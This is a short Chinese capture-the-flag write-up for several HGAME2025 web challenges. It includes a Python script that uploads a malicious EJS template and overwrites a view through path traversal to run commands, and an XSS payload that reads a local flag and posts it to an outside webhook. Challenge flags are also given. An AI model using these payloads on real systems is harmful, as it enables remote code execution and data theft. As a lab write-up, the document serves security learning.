HGAME2025 部分WP#

Web#

Level 24 Pacman#

null

栅栏分为2栏

1
hgame{u_4re_pacman_m4ster}

Level 47 BandBomb#

用了ejs模板，可以直接覆盖重新ejs文件RCE。

1
import requests
2

3
def upload_evil_template(url):
4
    # 构造恶意ejs模板
5
    evil_template = '''
6
    <%- global.process.mainModule.require('child_process').execSync('env') %>
7
    '''
8

9
    files = {
10
        'file': ('evil.txt', evil_template)
11
    }
12
    r = requests.post(f"{url}/upload", files=files)
13
    return r.json()['filename']
14

15
def move_template(url, filename):
16
    data = {
17
        'oldName': filename,
18
        'newName': '../../app/views/mortis.ejs'
19
    }
20
    return requests.post(f"{url}/rename", json=data)
21

22
def trigger_rce(url):
23
    return requests.get(f"{url}/")
24

25
def main():
26
    url = "http://node1.hgame.vidar.club:32025"
27

28
    print("[+] 上传恶意模板...")
29
    filename = upload_evil_template(url)
30

31
    print("[+] 移动模板文件...")
32
    move_template(url, filename)
33

34
    print("[+] 触发模板渲染...")
35
    r = trigger_rce(url)
36
    print(r.text)
37

38
if __name__ == "__main__":
39
    main()
40

41

42
# FLAG=hgame{@ve-mUJ1cA-HAs-BrokEn_up_BUt_wE_H@VE_UMIT4ki3c}

Level 69 MysteryMessageBoard#

首先是密码爆破

null

这里利用的是xss，附上脚本

1
<script>
2
fetch('http://127.0.0.1:8888/flag')
3
  .then(response => response.text())
4
  .then(data => {
5
    fetch('https://webhook.site/c149920f-141c-4d08-af14-1a6a58cbe3a9', {
6
      method: 'POST',
7
      body: data
8
    });
9
  });
10
</script>